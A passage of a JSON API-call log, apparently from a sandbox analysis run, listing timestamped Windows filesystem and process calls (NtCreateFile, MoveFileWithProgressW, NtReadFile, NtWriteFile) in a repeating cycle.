"2016-02-16 17:42:02,843", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:42:02,853", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,863", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,873", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:02,883", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,883", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,893", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:42:02,903", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,913", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,923", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", 
"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,933", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,943", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,953", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,963", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,973", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:02,983", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,993", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:03,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,053", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:03,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,093", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,113", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,123", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,133", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:42:03,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,223", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:03,223", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,233", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtCreateFile"}, 